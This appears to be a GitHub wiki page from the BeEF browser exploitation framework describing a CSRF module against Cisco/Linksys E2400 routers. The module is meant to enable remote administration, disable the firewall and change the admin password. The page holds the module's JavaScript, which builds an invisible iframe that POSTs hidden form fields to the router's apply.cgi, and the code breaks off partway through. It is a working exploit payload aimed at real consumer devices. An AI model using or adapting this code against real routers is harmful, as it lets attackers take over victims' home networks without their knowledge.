-
Notifications
You must be signed in to change notification settings - Fork 2.2k
Module: Cisco E2400 CSRF
Jess Williams edited this page Jan 13, 2020
·
3 revisions
-
Objective: enable remote admin, disable firewall and change password on Cisco/Linksys E2400
-
Authors: bcoles, n0x00
-
Browsers: All
Uses an invisible iframe with a POST request to change router configurations. The victim has to be logged into the router for the action to succeed.
var cisco_e2400_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST", "application/x-www-form-urlencoded",
[
{'type':'hidden', 'name':'submit_button', 'value':'Management'},
{'type':'hidden', 'name':'change_action', 'value':''},
{'type':'hidden', 'name':'action', 'value':'Apply'},
{'type':'hidden', 'name':'PasswdModify', 'value':'0'},
{'type':'hidden', 'name':'http_enable', 'value':'1'},
{'type':'hidden', 'name':'https_enable', 'value':'1'},
{'type':'hidden', 'name':'ctm404_enable', 'value':''},
{'type':'hidden', 'name':'remote_mgt_https', 'value':'1'},
{'type':'hidden', 'name':'wait_time', 'value':'4'},
{'type':'hidden', 'name':'need_reboot', 'value':'0'},
{'type':'hidden', 'name':'http_passwd', 'value':passwd},
{'type':'hidden', 'name':'http_passwdConfirm','value':passwd},
{'type':'hidden', 'name':'_http_enable', 'value':'1'},
{'type':'hidden', 'name':'_https_enable', 'value':'1'},
{'type':'hidden', 'name':'web_wl_filter', 'value':'0'},
{'type':'hidden', 'name':'remote_management', 'value':'1'},
//.....- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK